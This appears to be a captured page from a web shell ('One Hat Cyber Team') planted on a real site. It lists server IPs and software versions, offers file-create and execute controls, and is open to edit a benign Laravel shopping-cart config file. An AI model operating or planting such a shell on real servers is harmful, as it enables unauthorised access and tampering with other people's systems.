⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.30
Server IP:
45.79.8.107
Server:
Linux localhost 5.15.0-140-generic #150-Ubuntu SMP Sat Apr 12 06:00:09 UTC 2025 x86_64
Server Software:
nginx/1.18.0
PHP Version:
8.1.2-1ubuntu2.21
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
var
/
www
/
tourismtrainingbd.urvam.com
/
config
/
Edit File: cart.php
<?php return [ /* |-------------------------------------------------------------------------- | Gross price as base price |-------------------------------------------------------------------------- | | This default value is used to select the method to calculate prices and taxes | If true the item price is managed as a gross price, so taxes will be calculated by separation/exclusion | */ 'calculator' => \Gloudemans\Shoppingcart\Calculation\DefaultCalculator::class, /* |-------------------------------------------------------------------------- | Default tax rate |-------------------------------------------------------------------------- | | This default tax rate will be used when you make a class implement the | Taxable interface and use the HasTax trait. | */ 'tax' => 21, /* |-------------------------------------------------------------------------- | Shoppingcart database settings |-------------------------------------------------------------------------- | | Here you can set the connection that the shoppingcart should use when | storing and restoring a cart. | */ 'database' => [ 'connection' => null, 'table' => 'shoppingcart', ], /* |-------------------------------------------------------------------------- | Destroy the cart on user logout |-------------------------------------------------------------------------- | | When this option is set to 'true' the cart will automatically | destroy all cart instances when the user logs out. | */ 'destroy_on_logout' => false, /* |-------------------------------------------------------------------------- | Default number format |-------------------------------------------------------------------------- | | This defaults will be used for the formatted numbers if you don't | set them in the method call. | */ 'format' => [ 'decimals' => 2, 'decimal_point' => '.', 'thousand_separator' => ',', ], ];
Simpan